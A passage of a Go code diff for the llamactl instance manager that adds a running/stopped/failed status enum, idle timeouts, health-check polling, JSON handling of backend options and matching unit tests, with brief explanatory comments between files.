-	err := json.Unmarshal([]byte(jsonData), &inst)
-	if err != nil {
-		t.Fatalf("JSON unmarshal failed: %v", err)
-	}
-
-	if inst.Name != "test-instance" {
-		t.Errorf("Expected name 'test-instance', got %q", inst.Name)
-	}
-	if inst.Running {
-		t.Error("Expected running to be false")
-	}
-
-	opts := inst.GetOptions()
-	if opts != nil {
-		t.Error("Expected options to be nil when not provided in JSON")
-	}
-}
-
 func TestCreateInstanceOptionsValidation(t *testing.T) {
 	tests := []struct {
 		name string
@@ -377,13 +315,6 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 		expectedMax   int
 		expectedDelay int
 	}{
-		{
-			name:          "nil values",
-			maxRestarts:   nil,
-			restartDelay:  nil,
-			expectedMax:   0, // Should remain nil, but we can't easily test nil in this structure
-			expectedDelay: 0,
-		},
 		{
 			name:         "valid positive values",
 			maxRestarts:  testutil.IntPtr(10),
@@ -416,29 +347,29 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
 			options := &instance.CreateInstanceOptions{
 				MaxRestarts:  tt.maxRestarts,
 				RestartDelay: tt.restartDelay,
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model: "/path/to/model.gguf",
 				},
 			}

-			instance := instance.NewInstance("test", globalSettings, options)
+			// Mock onStatusChange function
+			mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
+
+			instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
 			opts := instance.GetOptions()

-			if tt.maxRestarts != nil {
-				if opts.MaxRestarts == nil {
-					t.Error("Expected MaxRestarts to be set")
-				} else if *opts.MaxRestarts != tt.expectedMax {
-					t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
-				}
+			if opts.MaxRestarts == nil {
+				t.Error("Expected MaxRestarts to be set")
+			} else if *opts.MaxRestarts != tt.expectedMax {
+				t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
 			}

-			if tt.restartDelay != nil {
-				if opts.RestartDelay == nil {
-					t.Error("Expected RestartDelay to be set")
-				} else if *opts.RestartDelay != tt.expectedDelay {
-					t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
-				}
+			if opts.RestartDelay == nil {
+				t.Error("Expected RestartDelay to be set")
+			} else if *opts.RestartDelay != tt.expectedDelay {
+				t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
 			}
 		})
 	}
 }


@@ -4,6 +4,7 @@ import (
 	"context"
 	"fmt"
 	"log"
+	"net/http"
 	"os/exec"
 	"runtime"
 	"syscall"
@@ -15,7 +16,7 @@ func (i *Process) Start() error {
 	i.mu.Lock()
 	defer i.mu.Unlock()

-	if i.Running {
+	if i.IsRunning() {
 		return fmt.Errorf("instance %s is already running", i.Name)
 	}

@@ -30,13 +31,15 @@ func (i *Process) Start() error {
 		i.restarts = 0
 	}

+	// Initialize last request time to current time when starting
+	i.lastRequestTime.Store(i.timeProvider.Now().Unix())
+
 	// Create log files
 	if err := i.logger.Create(); err != nil {
 		return fmt.Errorf("failed to create log files: %w", err)
 	}

 	args := i.options.BuildCommandArgs()
 	i.ctx, i.cancel = context.WithCancel(context.Background())
 	i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -61,7 +64,7 @@ func (i *Process) Start() error {
 		return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
 	}

-	i.Running = true
+	i.SetStatus(Running)

 	// Create channel for monitor completion signaling
 	i.monitorDone = make(chan struct{})
@@ -78,7 +81,7 @@ func (i *Process) Start() error {
 func (i *Process) Stop() error {
 	i.mu.Lock()

-	if !i.Running {
+	if !i.IsRunning() {
 		// Even if not running, cancel any pending restart
 		if i.restartCancel != nil {
 			i.restartCancel()
@@ -95,8 +98,8 @@ func (i *Process) Stop() error {
 		i.restartCancel = nil
 	}

-	// Set running to false first to signal intentional stop
-	i.Running = false
+	// Set status to stopped first to signal intentional stop
+	i.SetStatus(Stopped)

 	// Clean up the proxy
 	i.proxy = nil
@@ -106,19 +109,25 @@ func (i *Process) Stop() error {
 	i.mu.Unlock()

-	// Stop the process with SIGINT
-	if i.cmd.Process != nil {
+	// Stop the process with SIGINT if cmd exists
+	if i.cmd != nil && i.cmd.Process != nil {
 		if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
 			log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
 		}
 	}

+	// If no process exists, we can return immediately
+	if i.cmd == nil || monitorDone == nil {
+		i.logger.Close()
+		return nil
+	}
+
 	select {
 	case <-monitorDone:
 		// Process exited normally
 	case <-time.After(30 * time.Second):
 		// Force kill if it doesn't exit within 30 seconds
-		if i.cmd.Process != nil {
+		if i.cmd != nil && i.cmd.Process != nil {
 			killErr := i.cmd.Process.Kill()
 			if killErr != nil {
 				log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,6 +149,84 @@ func (i *Process) Stop() error {
 	return nil
 }

+func (i *Process) LastRequestTime() int64 {
+	return i.lastRequestTime.Load()
+}
+
+func (i *Process) WaitForHealthy(timeout int) error {
+	if !i.IsRunning() {
+		return fmt.Errorf("instance %s is not running", i.Name)
+	}
+
+	if timeout <= 0 {
+		timeout = 30 // Default to 30 seconds if no timeout is specified
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
+	defer cancel()
+
+	// Get instance options to build the health check URL
+	opts := i.GetOptions()
+	if opts == nil {
+		return fmt.Errorf("instance %s has no options set", i.Name)
+	}
+
+	// Build the health check URL directly
+	var host string
+	var port int
+	switch opts.BackendType {
+	case "llama_cpp":
+		host = opts.LlamaServerOptions.Host
+		port = opts.LlamaServerOptions.Port
+	}
+	if host == "" {
+		host = "localhost"
+	}
+	healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
+
+	// Create a dedicated HTTP client for health checks
+	client := &http.Client{
+		Timeout: 5 * time.Second, // 5 second timeout per request
+	}
+
+	// Helper function to check health directly
+	checkHealth := func() bool {
+		req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
+		if err != nil {
+			return false
+		}
+
+		resp, err := client.Do(req)
+		if err != nil {
+			return false
+		}
+		defer resp.Body.Close()
+
+		return resp.StatusCode == http.StatusOK
+	}
+
+	// Try immediate check first
+	if checkHealth() {
+		return nil // Instance is healthy
+	}
+
+	// If immediate check failed, start polling
+	ticker := time.NewTicker(1 * time.Second)
+	defer ticker.Stop()
+
+	for {
+		select {
+		case <-ctx.Done():
+			return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
+		case <-ticker.C:
+			if checkHealth() {
+				return nil // Instance is healthy
+			}
+			// Continue polling
+		}
+	}
+}
+
 func (i *Process) monitorProcess() {
 	defer func() {
 		i.mu.Lock()
@@ -155,12 +242,12 @@ func (i *Process) monitorProcess() {
 	i.mu.Lock()

 	// Check if the instance was intentionally stopped
-	if !i.Running {
+	if !i.IsRunning() {
 		i.mu.Unlock()
 		return
 	}

-	i.Running = false
+	i.SetStatus(Stopped)
 	i.logger.Close()

 	// Cancel any existing restart context since we're handling a new exit
@@ -185,6 +272,7 @@ func (i *Process) handleRestart() {
 	// Validate restart conditions and get safe parameters
 	shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
 	if !shouldRestart {
+		i.SetStatus(Failed)
 		i.mu.Unlock()
 		return
 	}

pkg/instance/options.go (new file, 141 lines)

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}
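Together, UnmarshalJSON and MarshalJSON let API clients exchange backend options as an untyped JSON map while the rest of the codebase works with the typed LlamaServerOptions. A round-trip sketch (the "llama_cpp" wire value and option keys are assumptions; only the BackendTypeLlamaCpp constant itself appears in this diff):
// Assumed wire format for a create-instance request body.
payload := []byte(`{
"backend_type": "llama_cpp",
"backend_options": {"model": "/path/to/model.gguf", "port": 8080}
}`)
var opts instance.CreateInstanceOptions
if err := json.Unmarshal(payload, &opts); err != nil {
log.Fatal(err) // unknown backend types are rejected here
}
// opts.LlamaServerOptions is now a typed *llamacpp.LlamaServerOptions;
// marshaling &opts re-emits it as the backend_options map.
out, _ := json.Marshal(&opts)
_ = out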

pkg/instance/status.go (new file, 70 lines)

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}
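The two name maps give the status enum a stable string form on the wire, and both directions degrade to "stopped" rather than erroring on unknown values, which keeps older persisted files loadable. For example:
b, _ := json.Marshal(instance.Running) // b == []byte(`"running"`)
var s instance.InstanceStatus
_ = json.Unmarshal([]byte(`"failed"`), &s) // s == instance.Failed
_ = json.Unmarshal([]byte(`"bogus"`), &s) // logs a warning, s == instance.Stopped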

pkg/instance/timeout.go (new file, 28 lines)

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}
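UpdateLastRequestTime is intended to be called on every request the proxy forwards, so ShouldTimeout only fires after a genuinely idle stretch. A minimal middleware sketch of that wiring (illustrative; the actual proxy hookup is not part of this diff):
package proxy // hypothetical

import (
"net/http"

"llamactl/pkg/instance"
)

// trackRequests refreshes the idle-timeout clock before forwarding each request.
func trackRequests(inst *instance.Process, next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
inst.UpdateLastRequestTime()
next.ServeHTTP(w, r)
})
}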


@@ -0,0 +1,220 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}


@@ -10,6 +10,7 @@ import (
"path/filepath"
"strings"
"sync"
+"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
@@ -20,7 +21,9 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
+IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
+EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
@@ -29,22 +32,52 @@ type InstanceManager interface {
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
+runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
+// Timeout checker
+timeoutChecker *time.Ticker
+shutdownChan chan struct{}
+shutdownDone chan struct{}
+isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
+if instancesConfig.TimeoutCheckInterval <= 0 {
+instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
+}
im := &instanceManager{
instances: make(map[string]*instance.Process),
+runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
+timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
+shutdownChan: make(chan struct{}),
+shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
+// Start the timeout checker goroutine after initialization is complete
+go func() {
+defer close(im.shutdownDone)
+for {
+select {
+case <-im.timeoutChecker.C:
+im.checkAllTimeouts()
+case <-im.shutdownChan:
+return // Exit goroutine on shutdown
+}
+}
+}()
return im
}
@@ -92,17 +125,43 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() {
im.mu.Lock()
-defer im.mu.Unlock()
-var wg sync.WaitGroup
-wg.Add(len(im.instances))
+// Check if already shutdown
+if im.isShutdown {
+im.mu.Unlock()
+return
+}
+im.isShutdown = true
+// Signal the timeout checker to stop
+close(im.shutdownChan)
+// Create a list of running instances to stop
+var runningInstances []*instance.Process
+var runningNames []string
for name, inst := range im.instances {
-if !inst.Running {
-wg.Done() // If instance is not running, just mark it as done
-continue
+if inst.IsRunning() {
+runningInstances = append(runningInstances, inst)
+runningNames = append(runningNames, name)
}
}
+// Release lock before stopping instances to avoid deadlock
+im.mu.Unlock()
+// Wait for the timeout checker goroutine to actually stop
+<-im.shutdownDone
+// Now stop the ticker
+if im.timeoutChecker != nil {
+im.timeoutChecker.Stop()
+}
+// Stop instances without holding the manager lock
+var wg sync.WaitGroup
+wg.Add(len(runningInstances))
+for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
@@ -110,7 +169,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
-}(name, inst)
+}(runningNames[i], inst)
}
wg.Wait()
@@ -177,16 +236,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
+statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
+im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
+}
// Create new inst using NewInstance (handles validation, defaults, setup)
-inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions())
+inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
-inst.Running = persistedInstance.Running
+inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
-if inst.GetOptions() != nil && inst.GetOptions().Port > 0 {
-port := inst.GetOptions().Port
+if inst.GetPort() > 0 {
+port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
@@ -202,7 +265,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
-if inst.Running && // Was running when persisted
+if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
@@ -214,9 +277,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance)
-inst.Running = false
+inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
+func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
+im.mu.Lock()
+defer im.mu.Unlock()
+if newStatus == instance.Running {
+im.runningInstances[name] = struct{}{}
+} else {
+delete(im.runningInstances, name)
+}
+}
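The reworked Shutdown is a snapshot-then-act pattern: gather the running instances while holding im.mu, release the lock, and only then block on the checker goroutine handoff and the instance stops. The ordering matters because stopping an instance fires the status callback, and onStatusChange (above) takes im.mu again; holding the lock across Stop would deadlock. The shape in miniature (illustrative fragment only):
mu.Lock()
snapshot := make([]*instance.Process, 0, len(instances))
for _, inst := range instances {
if inst.IsRunning() {
snapshot = append(snapshot, inst)
}
}
mu.Unlock() // release before any call that can re-enter the lock
for _, inst := range snapshot {
_ = inst.Stop() // may trigger onStatusChange, which locks mu
}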


@@ -1,15 +1,16 @@
package manager_test
import (
-"encoding/json"
+"fmt"
+"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
-"reflect"
"strings"
+"sync"
"testing"
)
@@ -22,15 +23,16 @@ func TestNewInstanceManager(t *testing.T) {
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
+TimeoutCheckInterval: 5,
}
-manager := manager.NewInstanceManager(cfg)
-if manager == nil {
+mgr := manager.NewInstanceManager(cfg)
+if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
-instances, err := manager.ListInstances()
+instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
@@ -39,479 +41,27 @@ func TestNewInstanceManager(t *testing.T) {
}
}
-func TestCreateInstance_Success(t *testing.T) {
+func TestPersistence(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := manager.NewInstanceManager(cfg)
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := inst.GetOptions().Port
if port < 8000 || port > 9000 {
